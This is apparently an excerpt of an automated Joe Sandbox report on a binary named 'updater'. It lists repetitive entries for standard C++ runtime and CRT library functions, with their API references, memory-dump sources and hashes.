Function 013FC41C Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC42D
int.LIBCPMT ref: 013FC444

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

moneypunct.LIBCPMT ref: 013FC467
std::_Facet_Register.LIBCPMT ref: 013FC47E
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC49E
Concurrency::cancel_current_task.LIBCPMT ref: 013FC4AB

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: 204c7a71d05b79bef1248abc1b0684f4a1fac7c618c7669c9a2eda7874981b11
Instruction ID: b000af5f7ba92bfa699e7dda756cb3dbe2b94f81910adb2b7bbdac9354db589f
Opcode Fuzzy Hash: 204c7a71d05b79bef1248abc1b0684f4a1fac7c618c7669c9a2eda7874981b11
Instruction Fuzzy Hash: 1401D67190011E9BCB12EF68D854ABDBB74BFA4718F18450DEA04B76D0DF34DA05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013FC4B1 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC4C2
int.LIBCPMT ref: 013FC4D9

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

moneypunct.LIBCPMT ref: 013FC4FC
std::_Facet_Register.LIBCPMT ref: 013FC513
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC533
Concurrency::cancel_current_task.LIBCPMT ref: 013FC540

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: c3df72058151e35ba5124ff440b88809a31c75cfdb841d449ea2a1ae1f88c5d3
Instruction ID: 812c18805b6d5a58878a73a4933360835354c191b67fddd1439f1313e72fc2ab
Opcode Fuzzy Hash: c3df72058151e35ba5124ff440b88809a31c75cfdb841d449ea2a1ae1f88c5d3
Instruction Fuzzy Hash: E901D671D0021ADBCB06EF68D854AFE7B75BFA4328F28011DEA14A72E0DF349A45C781

Uniqueness

Uniqueness Score: -1.00%

Function 013FC959 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC96A
int.LIBCPMT ref: 013FC981

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

numpunct.LIBCPMT ref: 013FC9A4
std::_Facet_Register.LIBCPMT ref: 013FC9BB
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC9DB
Concurrency::cancel_current_task.LIBCPMT ref: 013FC9E8

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
String ID:
API String ID: 1910018792-0
Opcode ID: 0c8491e6aa0e277937396d222b49913a4168fd62b8d66add676cce18e8251e19
Instruction ID: 3b172a45eaef1bfe07dbe15d582fb9fb14fd02909f08dfdc87df425d73e6ac6e
Opcode Fuzzy Hash: 0c8491e6aa0e277937396d222b49913a4168fd62b8d66add676cce18e8251e19
Instruction Fuzzy Hash: 1601D275D4011A9BCB05EB68D854ABEBB70BFA4358F18050EEA11A77E0DF349E05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013FC8C4 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC8D5
int.LIBCPMT ref: 013FC8EC

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

numpunct.LIBCPMT ref: 013FC90F
std::_Facet_Register.LIBCPMT ref: 013FC926
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC946
Concurrency::cancel_current_task.LIBCPMT ref: 013FC953

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
String ID:
API String ID: 1910018792-0
Opcode ID: 85cfa38026e947357f87201a35ddb233254e1bddb08f604f9074c3f36fd4f9a2
Instruction ID: bad857b6ad1caef19b003b2d8ff2fc261d624c33199aef519a96ce3609f4728b
Opcode Fuzzy Hash: 85cfa38026e947357f87201a35ddb233254e1bddb08f604f9074c3f36fd4f9a2
Instruction Fuzzy Hash: 5B01D27590011A9BCB01EB68D854EFEBBB4BFA4328F18440DEA10A72E1DF749E05C791

Uniqueness

Uniqueness Score: -1.00%

Function 013F6F3F Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013F6F50
int.LIBCPMT ref: 013F6F67

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

ctype.LIBCPMT ref: 013F6F8A
std::_Facet_Register.LIBCPMT ref: 013F6FA1
std::_Lockit::~_Lockit.LIBCPMT ref: 013F6FC1
Concurrency::cancel_current_task.LIBCPMT ref: 013F6FCE

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype
String ID:
API String ID: 3097546199-0
Opcode ID: 33e8c4b946da43e5aafa2a81a975af54d354c43bedd810321c8b719b83f1f1cd
Instruction ID: c8105f455df3dc0269f594e32e262e32c146210d5d49edce878ecdbd9b1b2779
Opcode Fuzzy Hash: 33e8c4b946da43e5aafa2a81a975af54d354c43bedd810321c8b719b83f1f1cd
Instruction Fuzzy Hash: F001F9B1D002169BCB11EB68D8516FDBB75BFA4368F28040DEA11A73E0DF749E49CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013F6EAA Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013F6EBB
int.LIBCPMT ref: 013F6ED2

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

codecvt.LIBCPMT ref: 013F6EF5
std::_Facet_Register.LIBCPMT ref: 013F6F0C
std::_Lockit::~_Lockit.LIBCPMT ref: 013F6F2C
Concurrency::cancel_current_task.LIBCPMT ref: 013F6F39

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
String ID:
API String ID: 3595785899-0
Opcode ID: 9d52058e36280bdee7d072090b49b56c1ba4f1af3f9ec2dbeebdc29098de82c8
Instruction ID: 1fcd5fab9f2d0fc38d63ee8c507cffe715867e308482c710e13b91efb06bef86
Opcode Fuzzy Hash: 9d52058e36280bdee7d072090b49b56c1ba4f1af3f9ec2dbeebdc29098de82c8
Instruction Fuzzy Hash: 8201D6B5D002169BCB11EB68D8556BD7B74BFA4728F14000DEA01A77E0DF74DE45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013F70FE Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013F710F
int.LIBCPMT ref: 013F7126

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

numpunct.LIBCPMT ref: 013F7149
std::_Facet_Register.LIBCPMT ref: 013F7160
std::_Lockit::~_Lockit.LIBCPMT ref: 013F7180
Concurrency::cancel_current_task.LIBCPMT ref: 013F718D

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
String ID:
API String ID: 1910018792-0
Opcode ID: d6325e8f69ee5982bf58507d634ac5e7d17faa1671eea9c81c61886b629c98b3
Instruction ID: a31e2b349bbda7008555cca6cbe50149ad78a526ddb5ab3b825430601f0508e7
Opcode Fuzzy Hash: d6325e8f69ee5982bf58507d634ac5e7d17faa1671eea9c81c61886b629c98b3
Instruction Fuzzy Hash: 2701F571D0011A9BCB11EF68D850AFDBBB1BFA4768F18051DEA11A76E0DF349E05C781

Uniqueness

Uniqueness Score: -1.00%

Function 01409417 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01409428
int.LIBCPMT ref: 0140943F

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

collate.LIBCPMT ref: 01409462
std::_Facet_Register.LIBCPMT ref: 01409479
std::_Lockit::~_Lockit.LIBCPMT ref: 01409499
Concurrency::cancel_current_task.LIBCPMT ref: 014094A6

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercollate
String ID:
API String ID: 3223962878-0
Opcode ID: cd6c223b826a60ccd5bd893536d3b9ba65c66511ad7f4b8e42683b5ce354dff0
Instruction ID: 88e7d64840e124218fc5e8b3dcfbcc001ad246a327820df61476957d4fa196d4
Opcode Fuzzy Hash: cd6c223b826a60ccd5bd893536d3b9ba65c66511ad7f4b8e42683b5ce354dff0
Instruction Fuzzy Hash: 8501D6719001169BCB12EB69D850ABE7B71BFA4358F19442ED914673E1DF34DA05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 014094AC Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 014094BD
int.LIBCPMT ref: 014094D4

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

messages.LIBCPMT ref: 014094F7
std::_Facet_Register.LIBCPMT ref: 0140950E
std::_Lockit::~_Lockit.LIBCPMT ref: 0140952E
Concurrency::cancel_current_task.LIBCPMT ref: 0140953B

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4267825564-0
Opcode ID: 48b02d37227044ffb7ac940581f739c34021e544358c44d6a0c377a251ae3a1a
Instruction ID: c6cec1c083a366a9af5cd7b0185bfede8030d33207347cc2aedc15e7998bf708
Opcode Fuzzy Hash: 48b02d37227044ffb7ac940581f739c34021e544358c44d6a0c377a251ae3a1a
Instruction Fuzzy Hash: 6801F976D0011A9BCB06EB6DD850AFEBB75BFA4728F14041EE904673E2DF349A01C781

Uniqueness

Uniqueness Score: -1.00%

Function 01409700 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01409711
int.LIBCPMT ref: 01409728

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

moneypunct.LIBCPMT ref: 0140974B
std::_Facet_Register.LIBCPMT ref: 01409762
std::_Lockit::~_Lockit.LIBCPMT ref: 01409782
Concurrency::cancel_current_task.LIBCPMT ref: 0140978F

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: 8ab6024e8b3c3f56125be505d7ce27a6ba87dea3ae36d66441bca6e58ab23e8b
Instruction ID: d5175b3c8433113f91a24d5403c5548d10cf5719da5f4c4194228395105a6dfd
Opcode Fuzzy Hash: 8ab6024e8b3c3f56125be505d7ce27a6ba87dea3ae36d66441bca6e58ab23e8b
Instruction Fuzzy Hash: EF01C4769001169BCB16EF69D850ABEBBB1BFA4718F18041ED905673E2DF349A01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0140966B Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140967C
int.LIBCPMT ref: 01409693

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

moneypunct.LIBCPMT ref: 014096B6
std::_Facet_Register.LIBCPMT ref: 014096CD
std::_Lockit::~_Lockit.LIBCPMT ref: 014096ED
Concurrency::cancel_current_task.LIBCPMT ref: 014096FA

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: 3e29a027d393cc6d907b19ec22e1c0c7f5c4640e409efbb622dfafc79c807a0b
Instruction ID: 6503466445f710601c8168109b52b8d564b04985b01c6da4e1a89a736932b0b4
Opcode Fuzzy Hash: 3e29a027d393cc6d907b19ec22e1c0c7f5c4640e409efbb622dfafc79c807a0b
Instruction Fuzzy Hash: 3401F9759001169BCB02EBA9DC60AFE7B71FFA4328F14051ED909673E1DF349A01C781

Uniqueness

Uniqueness Score: -1.00%

Function 01427946 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 01427994
_free.LIBCMT ref: 01427AE0

Strings

*?, xrefs: 01427989

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: c2435c114784b797fa6856977d9cdf00b5fb06a9875519311553b62671703d1f
Instruction ID: 9e765051560a20a13ad7c368a3cdc1fe43c053c1ad392de45cf57dd4b1c7d66c
Opcode Fuzzy Hash: c2435c114784b797fa6856977d9cdf00b5fb06a9875519311553b62671703d1f
Instruction Fuzzy Hash: 84614E75E002299FDF15CFA9C8805EEFBF5EF58320B64816AD915F7310E635AE818B90

Uniqueness

Uniqueness Score: -1.00%

Function 013ED84B Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013ED8D1

Strings

, xrefs: 013ED9A6
rowid, xrefs: 013ED948
column%d, xrefs: 013EDA08

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: $column%d$rowid
API String ID: 4218353326-801954022
Opcode ID: 106a4f6c256df1ea013733fcfd242aabe38f291e9ac7f81c245b5eb63a7dc0ad
Instruction ID: cc570132245bc001331b76ec1a69a0ecda44d7fb5ddc09a030fabaed685de7c5
Opcode Fuzzy Hash: 106a4f6c256df1ea013733fcfd242aabe38f291e9ac7f81c245b5eb63a7dc0ad
Instruction Fuzzy Hash: 4F61AF71E0032A9FEF15CF98C884BAEBBF9BF54218F144159E945AB282D730ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013B171B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013B1730
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013B176D

Part of subcall function 013FA8A9: _Yarn.LIBCPMT ref: 013FA8C8
Part of subcall function 013FA8A9: _Yarn.LIBCPMT ref: 013FA8EC

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 013B17AE
std::_Lockit::~_Lockit.LIBCPMT ref: 013B181F

Strings

bad locale name, xrefs: 013B1786

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_LockitYarn$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2090653598-1405518554
Opcode ID: b1f55d3f0af9866e01eebdef68991caf170727ebcae61dedef0a1b38fdd18c5a
Instruction ID: 040d876e924540812f7101d86f1d1c967ace83f075209d3d77ce32bd9c3bf7eb
Opcode Fuzzy Hash: b1f55d3f0af9866e01eebdef68991caf170727ebcae61dedef0a1b38fdd18c5a
Instruction Fuzzy Hash: 36318E72800B40DFC7359F1EE880696FBF4FF68A10B108A2FE19E87A50D770A501CB99

Uniqueness

Uniqueness Score: -1.00%

Function 014127C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,014127B7,?,?,0141277F,?,?,?), ref: 014127D7
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,014127B7,?,?,0141277F,?,?,?), ref: 014127EA
FreeLibrary.KERNEL32(00000000,?,?,014127B7,?,?,0141277F,?,?,?), ref: 0141280D

Strings

CorExitProcess, xrefs: 014127E2
mscoree.dll, xrefs: 014127D0

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e28576e28cb575e65e6429d344393d135e9d5c461e376841c2e1a11264c65de0
Instruction ID: 0fadfe4bc3cda4d60227b38b111f2b413659428d5cbda75816173adc5dcdd6f4
Opcode Fuzzy Hash: e28576e28cb575e65e6429d344393d135e9d5c461e376841c2e1a11264c65de0
Instruction Fuzzy Hash: B2F08271500219FBEB219BA5ED09F9EBE74EB44756F240165F900E21B4CBB08E00EB90

Uniqueness

Uniqueness Score: -1.00%

Function 0142E2A6 Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0142E562,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0142E349
__alloca_probe_16.LIBCMT ref: 0142E3FF
__alloca_probe_16.LIBCMT ref: 0142E495
__freea.LIBCMT ref: 0142E500
__freea.LIBCMT ref: 0142E50C

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 815053d85941a805b24bf944f7615ba601991e2f133f1fec4eea0c78f643a188
Instruction ID: 093e4f99c38a1500ca0f31d62c77e975a5fb25a5e6d29e324ee83c3f04638a81
Opcode Fuzzy Hash: 815053d85941a805b24bf944f7615ba601991e2f133f1fec4eea0c78f643a188
Instruction Fuzzy Hash: 6E81D8719001369BEF219EA9C840EEF7FB5AF19615F98016BEA04BB360E735D9C1C760

Uniqueness

Uniqueness Score: -1.00%

Function 0141E9B6 Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 0142255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0142838D,00000220,?,?,?,?,?,?,01413E8D,?), ref: 0142258E

_free.LIBCMT ref: 0141EAC5
_free.LIBCMT ref: 0141EADC
_free.LIBCMT ref: 0141EAF9
_free.LIBCMT ref: 0141EB14
_free.LIBCMT ref: 0141EB2B

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
